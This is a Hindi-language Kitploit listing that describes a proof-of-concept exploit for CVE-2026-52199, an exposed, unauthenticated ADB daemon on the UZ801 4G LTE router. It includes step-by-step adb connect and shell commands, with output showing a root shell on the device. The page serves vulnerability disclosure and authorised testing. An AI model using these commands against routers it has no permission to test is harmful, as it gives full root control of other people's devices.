Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-52199 — प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2026-52199 के लिए: UZ801 4G LTE राउटर पर उजागर ADB डेमॉन के माध्यम से अनधिकृत रिमोट कोड निष्पादन। इसमें भेद्यता विश्लेषण, प्रभाव मूल्यांकन, और अधिकृत सुरक्षा परीक्षण के लिए चरण-दर-चरण शोषण मार्गदर्शिका शामिल है। | Kitploit
उपकरण/GitHubGitHub/lamaper/cve-2026-52199
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूललैब और अभ्यास
GitHublamaper/cve-2026-52199

CVE-2026-52199

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2026-52199 के लिए: UZ801 4G LTE राउटर पर उजागर ADB डेमॉन के माध्यम से अनधिकृत रिमोट कोड निष्पादन। इसमें भेद्यता विश्लेषण, प्रभाव मूल्यांकन, और अधिकृत सुरक्षा परीक्षण के लिए चरण-दर-चरण शोषण मार्गदर्शिका शामिल है।

1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2026-52199 : UZ801 4G राउटर में अप्रमाणित रिमोट कोड निष्पादन

भेद्यता सारांश

एक गंभीर गलत पहुँच नियंत्रण भेद्यता Generic OEM UZ801_v2.1 4G LTE राउटर (फर्मवेयर V3.4.3) में मौजूद है। डिवाइस अनुचित रूप से एक अप्रमाणित एंड्रॉइड डिबग ब्रिज (ADB) डेमॉन (/sbin/adbd) को TCP पोर्ट 7628 पर आसन्न नेटवर्क (LAN/WiFi) के लिए उजागर करता है।

hardware_pcb

डिवाइस के स्थानीय नेटवर्क से जुड़ा एक हमलावर इस खामी का शोषण कर सभी प्रमाणीकरण तंत्रों को दरकिनार कर, एक ADB कनेक्शन स्थापित कर, और रूट विशेषाधिकारों के साथ मनमाना कोड निष्पादित कर सकता है।

साक्ष्य

प्रभावित उत्पाद

  • विक्रेता: Generic OEM / व्हाइट-लेबल इकोसिस्टम
  • उत्पाद: UZ801_v2.1 4G LTE राउटर
  • संस्करण: V3.4.3
  • भेद्य घटक: /sbin/adbd

प्रभाव

इस भेद्यता के शोषण से पूर्ण सिस्टम समझौता होता है। प्रभाव में शामिल हैं:

  • रिमोट कोड निष्पादन (RCE): True
  • विशेषाधिकार वृद्धि: True (सीधे root शेल में जाता है)
  • सूचना प्रकटीकरण: True (आंतरिक फ़ाइल सिस्टम और क्रेडेंशियल्स तक पूर्ण पहुँच)
  • सेवा अस्वीकार (DoS): True (डिवाइस को ब्रिक या हेरफेर करने की क्षमता)

प्रूफ ऑफ कॉन्सेप्ट (PoC)

शोषण प्रक्रिया में मानक adb क्लाइंट और आसन्न नेटवर्क पहुँच के अलावा किसी विशेष उपकरण की आवश्यकता नहीं है।

चरण 1: UZ801 राउटर के WiFi नेटवर्क से कनेक्ट करें (डिफ़ॉल्ट गेटवे आमतौर पर 192.168.100.1 होता है)।

चरण 2: खुले पोर्ट के लिए डिवाइस को स्कैन करें। पोर्ट 7628/TCP खुला दिखाई देगा।

चरण 3: हमलावर की मशीन से, अप्रलेखित पोर्ट पर ADB कनेक्शन शुरू करें:

root@kitploit:~
$ adb connect 192.168.100.1:7628
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.100.1:7628

चरण 4: एक इंटरैक्टिव शेल का अनुरोध करें:

root@kitploit:~
$ adb -s 192.168.100.1:7628 shell

चरण 5: हमलावर बिना किसी प्रमाणीकरण संकेत के तुरंत रूट शेल में प्रवेश कर जाता है:

root@kitploit:~
root@msm8916_32_512:/ # id
uid=0(root) gid=0(root) context=u:r:su:s0
root@msm8916_32_512:/ # uname -a
Linux localhost 3.10.49 #1 SMP PREEMPT ... aarch64

अस्वीकरण

केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए। इस रिपॉजिटरी में दी गई जानकारी और प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक उद्देश्यों और नेटवर्क को सुरक्षित करने में सहायता के लिए है। लेखक (lamaper) इस जानकारी के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। इस शोषण का उपयोग उन उपकरणों या नेटवर्कों के विरुद्ध न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।

टूल डाउनलोड करें